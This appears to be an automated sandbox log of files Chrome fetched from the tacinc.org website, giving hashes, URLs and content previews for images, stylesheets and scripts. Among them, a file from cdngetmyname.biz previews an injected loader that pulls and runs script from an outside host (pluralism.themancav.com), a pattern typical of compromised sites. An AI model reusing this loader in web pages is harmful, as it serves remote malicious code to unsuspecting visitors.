                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):2360
                                                                                                                                                                                                                              Entropy (8bit):4.0458655423838605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:RAF5MjQChDyz9/fBNIhcrqr7LsQXgT9mtjIw1wj:Crx1I+rqjs4m9Gwj
                                                                                                                                                                                                                              MD5:30A7CCA61782A5226153530C72951AD0
                                                                                                                                                                                                                              SHA1:BDF79CEB087C6D9F53E9716C7AF15A79554EC32F
                                                                                                                                                                                                                              SHA-256:6F4F5EF5BEED3809DE83AE132712F687794DDAA318A015BFA81AB5818AB33B28
                                                                                                                                                                                                                              SHA-512:22741BC9F47D74DB005EF38803A567D8F073F92999F007345CDEFA9DF0EA07C5E467257D62215B41FBD9BAB2B06637516838251498E4D1787B1969F8228D294F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/tac-child/images/search-icon.svg
                                                                                                                                                                                                                              Preview:<svg height="14" viewBox="0 0 14 14" width="14" xmlns="http://www.w3.org/2000/svg"><path d="m11.8173293 10.9730357-2.69789219-2.7010543c.32787132-.41266325.59016274-.89566041.78688522-1.449004.19672247-.55334358.29508217-1.13012606.29508217-1.73036309 0-.70340324-.1358299-1.36459329-.40749434-1.98358739-.26229612-.61899409-.62529009-1.15826244-1.08899285-1.61781914s-1.00468098-.82532181-1.62295029-1.09730316c-.61826931-.26260517-1.27868516-.39390462-1.98126478-.39390462-.70257961 0-1.3629939.13129945-1.98126478.39390462-.6182693.27198135-1.15924752.63774646-1.62295044 1.09730316-.46370245.4595567-.82669657.99882505-1.08899285 1.61781914-.27166415.6189941-.40749417 1.28018415-.40749417 1.98358739 0 .71278098.13583002 1.37866069.40749417 1.99765479.26229628.61899566.6252904 1.15826244 1.08899285 1.61781914.46370292.4595567 1.00468114.82532181 1.62295044 1.09730473.61827088.26260363 1.27868517.39390303 1.98126478.39390303.59953421 0 1.16627456-.098475 1.70023513-.29542805.533959-.1969531
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1440x708, components 3
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):9727
                                                                                                                                                                                                                              Entropy (8bit):7.095186844124069
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:LOcBHC2WMBcT2YAdyCMP7hJSLeAUz5Fh9Vl726q:LHBHVWMI2nO3SaAGh9Vlin
                                                                                                                                                                                                                              MD5:072FAB50AB27AC10863D23EBDD74504E
                                                                                                                                                                                                                              SHA1:ED4047C5A8AD0F7A1976516B60D2CC0114E8A7AF
                                                                                                                                                                                                                              SHA-256:0A09B71983112B97C3525DE079B404BFAA10B244F2D079925C1E2FC7110C0DEA
                                                                                                                                                                                                                              SHA-512:43DB4F5C511DDDAF221DE736319FBB76B9137EFF98E58A2BF8FA77F3956F3A29BE29579828CF3D46832D3EA3A4C936F2A7B184BB161DDA208A8CA67DF181480B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/2020/11/wave-background-dark.jpg
                                                                                                                                                                                                                              Preview:......JFIF...........................................$......$ &...& 9-''-9B747BOGGOd_d................................$......$ &...& 9-''-9B747BOGGOd_d.............."..................................................(..P.....@..@....(.....P..(..(..P..@..@..@....(..h..P..P..(..P.....@..@....(.....P.<...(..P..@..@..@....(..h..P.y@..(..P.....@..@....(.....P....(..P..@..@..@....(..h..P........@(..P......P(....@..@<..h..P.....@4.P...@...P..(.......@...(....@P......@4....,...(..P..@..@..@....(..h..Py`......@(.........P(....@..C...h..P.....@4.P...@...P..(..X.....@...P....@.......@4........(..P..@..@..@....(.....W.........(..........(....@..|...h..P.....@4.P...@...P..(......(.....@(.@....(..(.........h..P.....@4.P...@...P..(.`....(.....@(.@....(..(.........h..P.....@4.P...@...P..(y.....(.....@(.@....(..(.....0...h..P......4.P...@...P..)......(.....@(.@....(..(.........h..P......4.P...@...P../......(.....@(.@....(..(.............@...P....@.......@4...........P......4..(......P.:.............(
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:PNG image data, 367 x 266, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8301
                                                                                                                                                                                                                              Entropy (8bit):7.949553884449357
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:HMWjr3Yg66gz20L2UOXQfUoLdG711YMLEp65rKbzFJS4E:HMWjsPz2UOXIxAknbE
                                                                                                                                                                                                                              MD5:FA9A780745FC25A50A7C16257775E13D
                                                                                                                                                                                                                              SHA1:77D5E8E9A15C50D301567FEFD85A4A26E9990E76
                                                                                                                                                                                                                              SHA-256:091258B9A8D3B09709F08119EB99DC43A3215933B7504DC1E68FE7EF73DB341D
                                                                                                                                                                                                                              SHA-512:BDCE9F311F7C6DE2130C817545285474724FB21EDC2E1059C54A6FFBA7A2B4ECC3A104403D78B384D2E84EDC438C83894B327D848004BF3467608DFC0D81D828
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:.PNG........IHDR...o...........$.....PLTE0.G.....<&S...h..h..:#P9!O...?+XC2^Q=e...g..A=j4.KELze....a..c..^..IZ....Qw....[..V..Y..Ni............fUw.q......a.q.3...7..~...3.\.....m..h./....IDATx...s....WQ......q..3v..jO...uGj...'.Y.xw...BH.....f....;.;..3o.kM....O....>-._%.5y...V...dU.G..u.Lw.w.u./,".y...R..l..2.e......o.(.w....\.pP.u.z{-X.\f.....,*.._.;..%M.e...D.BK6.B..,..).........5.."...o..o...cJ....>>..m.....MJ8,R.B.h.'.H.......PzQ..w..b..-....M.-...ISD...Q..{.j.y................#......w...yUFj....l...t.S .<[.._.v..w..x..}..h_.a0#../.-.,..3...m.O\.-.F..@"os~J.&..p......{..y..7.{....}..`.s...'......".K.P>8?..._.XM&~%...g.u.!@..<.B.....$5u]*..K.:.;..S..u.O.mY]..;..=STE...o`s]nk......yc....*.|.D.wvb.......f7.r..a8.g4p.k..J!tb.Z.X.G.*i...bI..Yc....Z...4F..wm...B."..rf.46.\.h.C..E..j.M.P...w..F]..~.k...w.4u.....q....W'&.Kx#DN.Kx..a..!J.....cF.._.Y.wB.H..,.w..L..8oh.A...cs.i..xC..D......-p..['....]!..g.zf..X.,.....b..yK....y.<}.[oQ9
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):52916
                                                                                                                                                                                                                              Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                              MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                              SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                              SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                              SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):52916
                                                                                                                                                                                                                              Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                              MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                              SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                              SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                              SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (560)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):600
                                                                                                                                                                                                                              Entropy (8bit):4.473717278303013
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:UoCFsP9YsvwtuszKBpEGsvwtuszfjsRJvksvwtuszfjsHTksvwtuszfjsT9svwtX:BGi9DCR4poCRfyvvCRfKCRfQoCRf1CR4
                                                                                                                                                                                                                              MD5:77453D070B864F65E4316E798EA2EB32
                                                                                                                                                                                                                              SHA1:1DD8DDD43DB25BE96CF5F1DB32507A703C3B015D
                                                                                                                                                                                                                              SHA-256:9C8E5B60BE3FF3908F2A8BE00253D901C414FD09BAE50322B124ACC2417648EA
                                                                                                                                                                                                                              SHA-512:FF386DAAAD0CCCB7C28DB580C04721CAD63E5ED815CA4D892B36147D521BBB4BBD939A94CF893BB75E031A6AE64208E2CB376082E6CE75006A4D823BDCD808C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/elementor/assets/css/widget-heading.min.css
                                                                                                                                                                                                                              Preview:/*! elementor - v3.24.0 - 09-10-2024 */..elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):7236
                                                                                                                                                                                                                              Entropy (8bit):7.97321495379936
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:MKXqV2dtImatJ8wa/V8THM8LKndrGTt9YqkbIqCoQnJvThxrO1ytpOh05:uVpmaKv8LsCTtI0JJhxrO1Z05
                                                                                                                                                                                                                              MD5:1E5F509BBB6E8F79A24BC5A2788E3C9B
                                                                                                                                                                                                                              SHA1:2FAE925BD18C062A3AE62653556289CDAC0C4C54
                                                                                                                                                                                                                              SHA-256:E8D5E567460186B91325D970499D65E9D69A4053ECC9492798D029E849F9BE6C
                                                                                                                                                                                                                              SHA-512:9D90E72A8794500166DD8772AC1B8E2DC5BB3EA44CE8CCAA3CA506C5148015758F5476C20E2FC2A616123C03B7027FE30A84BF3A6A1BBD759FE56552AB5E8695
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/2020/11/logo.png
                                                                                                                                                                                                                              Preview:RIFF<...WEBPVP8L0.../..[...$G....X.?.}......*.lW.9....[@.f2_..W.d.....Y...C,*.O.\[...|.m..s."2L'.!58E....w.u......O.....?..f.....j...A.;0z....)..2.e..A.;.v.;.m..kS.C4....Up...%..$%h..c .^.4..F...(@...;.`.".................O..Xc.....!\...\....o...:.|.|.M..S.;....\&..i.1.Q.o..n{7.......|...fW.t....K.....sb'..G.m...jCU...8.g.`Z..T.....1....K...b9.?..............ru{.<T......m.H.....?"&...^...0.e......z{.s..........m....B..$3...;..d..1...L"......4......r.+B.{[.-o.m.....6].yY.m...~....b>DDI..Y...t.Lzq2..XB..._'..?........??......~........??........^.w.j.wc......y.....3....G...Q...X.P..o..].-.W..-.._.Y..b..uH W..DS.x.!...~m...s.$'0....5a.F.h.p.k.1I.h.....-.n...j.>...C/\..>-..`....FZ.9......C]..@..{.4..5F.....X./..Gdw.....*2.o...#.1"......q......Q..S....UI..+Ei.].*p.G.*....7s'..f%.s..Gg.@~B&.9:...j-r'E.7%_.N*`p..*;..7.{..G.t....(...K.;...W+.......90.3..^?.H.....R....t.Ls..YL..Gu...n.l..$../.a........#.^.;e,q.1.........>._....U...
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8166), with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):21023
                                                                                                                                                                                                                              Entropy (8bit):5.312899226772537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Lm/CDEqBfPf4yoQRPzF2bBrBvy8aYA17oTgVl9ZDlfHni4RW+:0CDEqBfHoQR7F2bBrpCYA17oTyl9Z1G+
                                                                                                                                                                                                                              MD5:2F22804E2D243AF2B2DF992BC445A31F
                                                                                                                                                                                                                              SHA1:6D1874CBBC670017DB10FCB71F082A93A111B24D
                                                                                                                                                                                                                              SHA-256:CC511F17A0DE02CA84F689B7B5E53F855C3302E5D2613DEA6C463C589B5B715D
                                                                                                                                                                                                                              SHA-512:4C074E31DECAA7F13EF49B620D9B71240241A9B0368C35F626978A11210CFA626B539C3CF7084BB5516314AF3737A7E846F89AA84F14354483F5B20A19B52A2C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/hummingbird-assets/c32f45114cc801a4d6b3b663b88bcf96.js
                                                                                                                                                                                                                              Preview:/**handles:theme-script,ecs_ajax_load,smush-lazy-load,jetpack-stats,ecs-script**/..jQuery(document).ready(function(){}),function(s){s(document).ready(function(){navigator.userAgent.toLowerCase().match(/(iphone|ipod|android|iemobile)/);var e=s("#sf-option-params").data("template-directory"),t=s("#sf-option-params").data("stylesheet-directory");s("#sf-option-params").data("home"),document.title,document.URL;s(".elementor-post__read-more").append(' <i aria-hidden="true"><img class="inject-me" data-src="'+e+'/images/icon-arrow.svg" src="'+e+'/images/icon-arrow.png" /></i>'),s(".elementor-search-form__submit i").html(' <img class="inject-me" data-src="'+t+'/images/icon-search.svg" src="'+t+'/images/icon-search.png" />'),s(".elementor-search-form__submit i").removeClass("fa").removeClass("fa-search"),0<s("img.inject-me").length&&(a=document.querySelectorAll("img.inject-me"),SVGInjector(a,{},function(e){})),s(".elementor-widget-tabs").each(function(){$thisMenu=s(this).find(".elementor-tabs-wr
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 367x266, components 3
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):18221
                                                                                                                                                                                                                              Entropy (8bit):7.966733678103932
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:xB3WbtBfT84iMteMZ4QuOegNwKtAeQBXtAThRFU:z3Mzlxt54grs9AT9U
                                                                                                                                                                                                                              MD5:BA82D93BADA7AAC2AFD0B3663D89D5A0
                                                                                                                                                                                                                              SHA1:33A19D9909B38441A628FA6036CF030C2C60D0F7
                                                                                                                                                                                                                              SHA-256:D0758EDF5F7711B4B5E229A0C2F07CDACF45306AB3291D078DC7D30D08DDB1F5
                                                                                                                                                                                                                              SHA-512:767CE873D71D21288BA33F1A361E6CE58DB7AD6D59C3358A051214880F3C94F483A342999076A1A7A1DEF9CD54AAE2254646F85253A48F53A94113AA32B68A68
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/2022/10/Conrad_Medicaid_Mental_Health_Youth_3x2-367x266.jpeg
                                                                                                                                                                                                                              Preview:......JFIF...........................................$......$ &...& 9-''-9B747BOGGOd_d................................$......$ &...& 9-''-9B747BOGGOd_d...........o.."..........4...................................................................H....V...%C......-..I541S..5.@5!..x.x.....x:..yb...V.i..i)..._.....#.&..G&....7+E7.,..'........^.^...LoK......5....#....]c..j@&la..Y.q..)0.....\YB..Q...#......J2y_..{x..3Zl......4]c.d..m.z%....4U.K...R..B...S...........R.R.m.jJ..4..!.%..aE&..A...W*v...........G...8X.!B..D.L..)e....,S....\).&D......X......\...f.7.........aZ.1Y..Z}..J.....j<....4,...g}..iT.q8.XL.v..|............D...x.^..U...U..c....|... {c(.E..HQ.s.A..S..'..7-i.....&...i..j.d.<."7 `8..crx..MC!..........T....Cf..).....'}.&O..}..b`.1......i.......\'..L(..Ww.....i....K|.f.-K.M2.p..k.,u}.cs..3......]J"..Z.R..h).D7..:.J...~....w....7l.j...y.H.l....+.....z|.x..A..7.....T..|@B..Y...v.4..I.=.^.j......o....:Ex.o.....i.f..rW!.p.P.W..~.EJ..a..XK..r.._
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1320)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1360
                                                                                                                                                                                                                              Entropy (8bit):5.131237769754918
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:BGiL9VqsRthp0Mejm4s1RWe2LSaaq1aa5/DM/RR2ns4t8oYRFOobvuh0usUiEFyk:Bf9bLToj4we2L9DM/RQnv8oYjOobG53l
                                                                                                                                                                                                                              MD5:3D8175D8609012AB16CFFD6A79B0E107
                                                                                                                                                                                                                              SHA1:30BFC0A545C1F81EA3372CC4F2BF62843B5AE7CA
                                                                                                                                                                                                                              SHA-256:D62B100B1B584503697F88B5F2D2C03C52BF346A3C6DD7FFF2D3C5483B0A2C81
                                                                                                                                                                                                                              SHA-512:D240F8007743CDAE91B1D7FCC4D4133EAEA2F088DE0EED8DE5FAC0967C89A0AD7D9D25270591FECB6C4AE88966DA294DC250E7506A53F12DA1F43E0860143E5E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/*! elementor - v3.24.0 - 09-10-2024 */."use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[357],{1327:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class TextEditor extends elementorModules.frontend.handlers.Base{getDefaultSettings(){return{selectors:{paragraph:"p:first"},classes:{dropCap:"elementor-drop-cap",dropCapLetter:"elementor-drop-cap-letter"}}}getDefaultElements(){const e=this.getSettings("selectors"),t=this.getSettings("classes"),r=jQuery("<span>",{class:t.dropCap}),p=jQuery("<span>",{class:t.dropCapLetter});return r.append(p),{$paragraph:this.$element.find(e.paragraph),$dropCap:r,$dropCapLetter:p}}wrapDropCap(){if(!this.getElementSettings("drop_cap"))return void(this.dropCapLetter&&(this.elements.$dropCap.remove(),this.elements.$paragraph.prepend(this.dropCapLetter),this.dropCapLetter=""));const e=this.elements.$paragraph;if(!e.length)return;const t=e.html().replace(/&nbsp;/g," "),r=t.match(/^ *([^ ] ?)/);if(!r)return;
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.749632897976469
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:tBuvTrkjTri3mc4slm0QgJlFMuxQgtuAtWKqY:t2r2ri3I0QgHFEggxY
                                                                                                                                                                                                                              MD5:51F8F6F0C4882A96FA2A99BA36CA20A6
                                                                                                                                                                                                                              SHA1:5E94797FA0A0F9D0662E4870CFCCE6ADCFF47D25
                                                                                                                                                                                                                              SHA-256:2CFE281A2FAE81D9AAE35EEB56D0C7C012FCA92EB743241179BAB9472DC9AFC5
                                                                                                                                                                                                                              SHA-512:D8788E24D7FD0B4FD982DAC06423495ED84CE54D2EC215A35947929E20D6069A3B22FF29886101A665AE3C15B6F81F2D4D93A83327418FC05934C359AAE8F579
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/tac-child/images/icon-close.svg
                                                                                                                                                                                                                              Preview:<svg enable-background="new -29 6 39.6 40" viewBox="-29 6 39.6 40" xmlns="http://www.w3.org/2000/svg"><path d="m7.9 10.8-2.2-2.1-15 15-15-15-2.1 2.1 15 15-15 15 2.1 2.2 15-15.1 15 15.1 2.2-2.2-15-15z"/></svg>
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):233
                                                                                                                                                                                                                              Entropy (8bit):5.338658539888879
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:fO9gO9lfTRWF8tK8dGIdt2RvVTPT46VaR:GTfTRWF8tK8dVUVPvVaR
                                                                                                                                                                                                                              MD5:A6625B76F6A2632044E544FF887F32D5
                                                                                                                                                                                                                              SHA1:4A55406E63ED4AB8653A967ED7F01A65EBA93401
                                                                                                                                                                                                                              SHA-256:3960860ED9B76D13E5FEF1DE990D3F83165E4DB0C180E4D6D088D0B94BC2C3DC
                                                                                                                                                                                                                              SHA-512:0563BFBC16B0E8D199FEC3EDB3E0F1DF8F135E51E97AB0B978564F0E5934E1623A9B0B7AD72CDB6078CE0CAF36ACB1F206D2B51E1005F2017031FA7D39947DF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://cdngetmyname.biz/flow.js
                                                                                                                                                                                                                              Preview: ;(function(l,h,n,g,o){g=l.createElement(h);o=l.getElementsByTagName(h)[0];g.async=1;g.src=n;o.parentNode.insertBefore(g,o);})(document,'script','https://pluralism.themancav.com/0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ==');
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6169)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):6213
                                                                                                                                                                                                                              Entropy (8bit):5.471297172722513
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:BPIOhUwrI77GmiYoFiMEO/HatAQY4NXhsdnCMl2q3VMFVKdOlQGK0jDjY8k2:ZIKU1eYoFiGa3NXzk3KMd8Qqjpk2
                                                                                                                                                                                                                              MD5:C36740EBDAF3DFF3B9D43FB0E3B843E1
                                                                                                                                                                                                                              SHA1:AD4B9F4DB7DCFDB277D01C9E23A439753B2FBEC0
                                                                                                                                                                                                                              SHA-256:4B1AC8A583E3221087FCDAEC02A8F0C75C75A0E8BCC4D68C35552F5BE6387EAD
                                                                                                                                                                                                                              SHA-512:CC51D856A6F64AE68D554383B8C953E8F8231D0798F6D948CB8662F106D6EC08C359BD2CC757CAE03C5D9F16D859B73FD713B443C96ABC862672D20EAD1AAD23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js
                                                                                                                                                                                                                              Preview:/*! elementor-pro - v3.24.0 - 09-10-2024 */.(()=>{"use strict";var e,r,a,n={},c={};function __webpack_require__(e){var r=c[e];if(void 0!==r)return r.exports;var a=c[e]={exports:{}};return n[e].call(a.exports,a,a.exports,__webpack_require__),a.exports}__webpack_require__.m=n,e=[],__webpack_require__.O=(r,a,n,c)=>{if(!a){var i=1/0;for(o=0;o<e.length;o++){for(var[a,n,c]=e[o],t=!0,_=0;_<a.length;_++)(!1&c||i>=c)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](a[_])))?a.splice(_--,1):(t=!1,c<i&&(i=c));if(t){e.splice(o--,1);var b=n();void 0!==b&&(r=b)}}return r}c=c||0;for(var o=e.length;o>0&&e[o-1][2]>c;o--)e[o]=e[o-1];e[o]=[a,n,c]},__webpack_require__.f={},__webpack_require__.e=e=>Promise.all(Object.keys(__webpack_require__.f).reduce(((r,a)=>(__webpack_require__.f[a](e,r),r)),[])),__webpack_require__.u=e=>635===e?"code-highlight.d86022c8668c4b072592.bundle.min.js":519===e?"video-playlist.af20fd9fd8778929829e.bundle.min.js":375===e?"paypal-button.f4f64e46173f50701949.b
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):307547
                                                                                                                                                                                                                              Entropy (8bit):5.575006163046439
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:z4z08438VtoYrnISDPLj0h6bmtikU7KlXiTR:Ez2sXoYYW4AR
                                                                                                                                                                                                                              MD5:127710144A17359CE9C76C1C2FEB024D
                                                                                                                                                                                                                              SHA1:738A980096C4E6930A5434BE2E23B882D1EC456B
                                                                                                                                                                                                                              SHA-256:24AED138C8607041EC697388947A391CC8D6F011692CF73DCD61DD8BA62CF34E
                                                                                                                                                                                                                              SHA-512:EFA5C0437E1F0FB9A84C88E7255C964CB58D70EB24888FAD68EFC80C9DFA08D5BFAB52635E738850052C476F4CE94EBFCD39E0682A86893DCA7C46A2CA339C65
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=G-VZFP9C0M5Y&l=dataLayer&cx=c
